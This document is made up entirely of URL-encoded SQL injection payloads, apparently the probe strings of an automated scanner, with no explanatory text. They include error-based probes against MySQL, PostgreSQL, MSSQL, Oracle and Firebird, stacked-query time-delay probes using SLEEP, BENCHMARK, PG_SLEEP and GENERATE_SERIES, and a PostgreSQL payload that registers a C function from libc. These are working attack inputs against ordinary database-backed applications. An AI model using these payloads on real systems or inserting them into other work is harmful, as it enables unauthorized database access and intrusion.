%28EXTRACTVALUE%281777%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281777%3D1777%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%29 %28UPDATEXML%285382%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285382%3D5382%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C6458%29%29 %28CAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289096%3D9096%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%29 %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282183%3D2183%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%29 %28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287613%3D7613%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%202299%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%202299%20WHEN%202299%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%29 1%2C%28SELECT%209535%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%289535%3D9535%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%2CEXTRACTVALUE%289668%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%289668%3D9668%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%2CUPDATEXML%286305%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%286305%3D6305%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2409%29 1%2C%28CAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281019%3D1019%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%29 1%2C%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281383%3D1383%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%29 1%2C%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289914%3D9914%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%29%3B%20SELECT%20SLEEP%285%29%3B%23 1%27%29%3B%20SELECT%20SLEEP%285%29%3B%23 1%27%3B%20SELECT%20SLEEP%285%29%3B%23 1%22%3B%20SELECT%20SLEEP%285%29%3B%23 1%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%283924%3D3924 1%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%283397%3D3397 1%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%289177%3D9177 1%3B%20SELECT%20SLEEP%285%29%3B%23 1%27%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%27lDEb%27%3D%27lDEb 1%27%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%27TaTP%27%3D%27TaTP 1%27%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%27kBpq%27%3D%27kBpq 1%27%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%27wquK%27%3D%27wquK 1%27%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%27KcbX%27%20LIKE%20%27KcbX 1%27%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%27FPjM%27%20LIKE%20%27FPjM 1%27%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%27vxFf%27%20LIKE%20%27vxFf 1%27%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%27AvFq%27%20LIKE%20%27AvFq 1%22%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%22cOcJ%22%3D%22cOcJ 1%22%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%22eakj%22%3D%22eakj 1%22%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%22zPbf%22%3D%22zPbf 1%22%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%22WboF%22%3D%22WboF 1%22%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%22vCuv%22%20LIKE%20%22vCuv 1%22%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%22nObI%22%20LIKE%20%22nObI 1%22%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%22zbur%22%20LIKE%20%22zbur 1%22%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%22PTmG%22%20LIKE%20%22PTmG 1%29%20WHERE%205193%3D5193%3B%20SELECT%20SLEEP%285%29%3B%23 1%27%29%20WHERE%201420%3D1420%3B%20SELECT%20SLEEP%285%29%3B%23 1%27%20WHERE%203642%3D3642%3B%20SELECT%20SLEEP%285%29%3B%23 1%22%20WHERE%207782%3D7782%3B%20SELECT%20SLEEP%285%29%3B%23 1%27%20%7C%7C%20%28SELECT%209186%20FROM%20DUAL%20WHERE%205683%3D5683%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205353%20WHERE%205828%3D5828%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207342%20FROM%20DUAL%20WHERE%206599%3D6599%3B%20SELECT%20SLEEP%285%29%3B%23%20%29 1%20%2B%20%28SELECT%208972%20WHERE%207800%3D7800%3B%20SELECT%20SLEEP%285%29%3B%23%20%29 1%27%20%2B%20%28SELECT%20%27bcoj%27%20FROM%20DUAL%20WHERE%204402%3D4402%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27aBAE%27%20WHERE%208408%3D8408%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20SLEEP%285%29%3B%23%20%23 1%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%286845%3D6845 1%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%288043%3D8043 1%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%286286%3D6286 1%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%27JbfX%27%3D%27JbfX 1%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%27Ezco%27%3D%27Ezco 1%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%28%27wfPT%27%3D%27wfPT 1%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%27kRWE%27%3D%27kRWE 1%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%27lNqJ%27%20LIKE%20%27lNqJ 1%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%27NRxD%27%20LIKE%20%27NRxD 1%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%28%27VVfa%27%20LIKE%20%27VVfa 1%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%27SjWh%27%20LIKE%20%27SjWh 1%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%22cXhe%22%3D%22cXhe 1%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%22Gpds%22%3D%22Gpds 1%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%28%22mEfQ%22%3D%22mEfQ 1%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%22srQw%22%3D%22srQw 1%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%22VNNY%22%20LIKE%20%22VNNY 1%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%22CUcC%22%20LIKE%20%22CUcC 1%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%28%28%28%22cqrl%22%20LIKE%20%22cqrl 1%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20AND%20%22wHzc%22%20LIKE%20%22wHzc 1%29%20WHERE%207702%3D7702%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%27%29%20WHERE%204598%3D4598%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%27%20WHERE%202364%3D2364%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%22%20WHERE%208512%3D8512%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23 1%27%20%7C%7C%20%28SELECT%201293%20FROM%20DUAL%20WHERE%208425%3D8425%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203435%20WHERE%204997%3D4997%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201273%20FROM%20DUAL%20WHERE%203932%3D3932%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%29 1%20%2B%20%28SELECT%209843%20WHERE%203434%3D3434%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%29 1%27%20%2B%20%28SELECT%20%27ySwO%27%20FROM%20DUAL%20WHERE%207169%3D7169%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ajmq%27%20WHERE%204881%3D4881%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6b625869%29%29%3B%23%20%23 1%29%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%27%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%22%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%285676%3D5676 1%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%286108%3D6108 1%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%286755%3D6755 1%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27COHX%27%3D%27COHX 1%27%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%27DaYs%27%3D%27DaYs 1%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%27pPLL%27%3D%27pPLL 1%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27EaMy%27%3D%27EaMy 1%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27HRZo%27%20LIKE%20%27HRZo 1%27%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%27xXCf%27%20LIKE%20%27xXCf 1%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%27tLZO%27%20LIKE%20%27tLZO 1%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27ndVL%27%20LIKE%20%27ndVL 1%22%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%22KfdZ%22%3D%22KfdZ 1%22%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%22ZGoU%22%3D%22ZGoU 1%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%22BFPJ%22%3D%22BFPJ 1%22%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%22PnbN%22%3D%22PnbN 1%22%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%22SLRg%22%20LIKE%20%22SLRg 1%22%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%22HvmB%22%20LIKE%20%22HvmB 1%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%22KFzW%22%20LIKE%20%22KFzW 1%22%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%22UWDG%22%20LIKE%20%22UWDG 1%29%20WHERE%204596%3D4596%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%27%29%20WHERE%205787%3D5787%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%27%20WHERE%208921%3D8921%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%22%20WHERE%205896%3D5896%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1%27%20%7C%7C%20%28SELECT%209727%20FROM%20DUAL%20WHERE%202385%3D2385%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205882%20WHERE%204174%3D4174%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203097%20FROM%20DUAL%20WHERE%207167%3D7167%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29 1%20%2B%20%28SELECT%201313%20WHERE%202622%3D2622%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29 1%27%20%2B%20%28SELECT%20%27MRcx%27%20FROM%20DUAL%20WHERE%207265%3D7265%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RNrI%27%20WHERE%204204%3D4204%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%23 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%285489%3D5489 1%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%282342%3D2342 1%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%284794%3D4794 1%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%27nlHY%27%3D%27nlHY 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%27IvSp%27%3D%27IvSp 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%27ttgz%27%3D%27ttgz 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%27Whty%27%3D%27Whty 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%27RPff%27%20LIKE%20%27RPff 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%27Iajp%27%20LIKE%20%27Iajp 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%27dhgX%27%20LIKE%20%27dhgX 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%27SUyX%27%20LIKE%20%27SUyX 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%22sbpU%22%3D%22sbpU 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%22PDGs%22%3D%22PDGs 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%22dNgA%22%3D%22dNgA 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%22qeBr%22%3D%22qeBr 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%22Zhtk%22%20LIKE%20%22Zhtk 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%22ijGk%22%20LIKE%20%22ijGk 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%22HSvT%22%20LIKE%20%22HSvT 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%22YlzG%22%20LIKE%20%22YlzG 1%29%20WHERE%202490%3D2490%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%27%29%20WHERE%201563%3D1563%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%27%20WHERE%205987%3D5987%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%22%20WHERE%201541%3D1541%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1%27%20%7C%7C%20%28SELECT%204141%20FROM%20DUAL%20WHERE%206291%3D6291%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201320%20WHERE%203022%3D3022%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208105%20FROM%20DUAL%20WHERE%206833%3D6833%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29 1%20%2B%20%28SELECT%209732%20WHERE%202079%3D2079%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29 1%27%20%2B%20%28SELECT%20%27HfAJ%27%20FROM%20DUAL%20WHERE%209467%3D9467%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NYrQ%27%20WHERE%207781%3D7781%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%23 1%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%286123%3D6123 1%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%282766%3D2766 1%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%287888%3D7888 1%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%27dnRi%27%3D%27dnRi 1%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%27IYDg%27%3D%27IYDg 1%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%27lOOT%27%3D%27lOOT 1%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%27kzeo%27%3D%27kzeo 1%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%27ldkD%27%20LIKE%20%27ldkD 1%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%27qDgl%27%20LIKE%20%27qDgl 1%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%27jgIc%27%20LIKE%20%27jgIc 1%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%27nvUz%27%20LIKE%20%27nvUz 1%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%22MYks%22%3D%22MYks 1%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%22OLTl%22%3D%22OLTl 1%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%22WVfY%22%3D%22WVfY 1%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%22Raop%22%3D%22Raop 1%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%22YNzt%22%20LIKE%20%22YNzt 